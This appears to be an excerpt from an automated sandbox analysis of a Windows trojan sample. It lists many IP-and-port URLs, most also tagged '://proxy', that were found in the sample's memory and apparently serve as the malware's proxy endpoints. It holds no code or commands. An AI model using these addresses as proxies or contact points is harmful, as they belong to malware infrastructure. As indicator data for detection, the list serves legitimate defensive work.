                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.3.108://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.3.108:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.3.98
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.3.98://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.3.98:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.35.15
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.35.15://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.35.15:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.36.21
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.36.21://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.36.21:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.38.96
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.38.96://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.38.96:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.53.215
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C69D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.53.215://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.69.9
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.69.9://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.67.69.9:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.83.159.65:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.83.159.65:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.235:43209
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.235:43209://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.87:44374
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.111.87:44374://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.213.177
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.213.177://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.93.213.177:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.209.66.178:16099
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.209.66.178:16099://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:36790
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:36790://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:44416
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.209.49:44416://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:14549
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:14549://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:20592
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:20592://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:39545
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:39545://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:44672
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:44672://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:54099
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:54099://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:57118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:57118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:61211
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.237.43:61211://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.240.168:10267
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.240.168:10267://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FA0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.240.168:20341
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.240.168:20341://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.240.168:39180
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.240.168:39180://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.240.168:58854
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.212.240.168:58854://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.245.49.27
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.245.49.27://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.245.49.27:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1CE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C670F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.20.84:52100
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C670F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.20.84:52100://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.20.84:52100x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.29.243:9123
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.29.243:9123://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.30.165:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.30.165:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.30.197:8118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.30.197:8118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:16708
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:16708://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80E0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C807E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:17827
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:17827://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:19633
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:19633://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:19633x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:26686
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:26686://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB071000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAFF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:27427
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB025000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:27427://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:44194
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:44194://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:45241
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:45241://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:49382
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:49382://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:49851
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:49851://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:52019
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:52019://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:5640
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:5640://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:62690
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:62690://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7ED8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:8221
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.249.33.122:8221://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C788D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.255.119.18
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C784B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.255.119.18://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7820000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.255.119.18:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.44.141.179:2006
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://173.44.141.179:2006://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.126.217.110
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.126.217.110://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.126.217.110:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.136.57.169:30453
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.136.57.169:30453://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.138.176.78:24697
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.138.176.78:24697://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.141.233.168:1287
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.141.233.168:1287://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.64.199.79:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.64.199.79:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA5F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.64.199.82:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.64.199.82:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.75.211.222:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.75.211.222:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.77.111.196:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.77.111.196:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.77.111.197:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.77.111.197:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB02D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.77.111.198:49547
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB029000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://174.77.111.198:49547://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.100.103.170:55443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.100.103.170:55443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.100.91.212:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.100.91.212:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.106.10.227:7878
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.106.10.227:7878://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.139.179.65:42580
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.139.179.65:42580://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.183.82.221
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.183.82.221://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.183.82.221:8193
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.183.82.221:8193://proxy
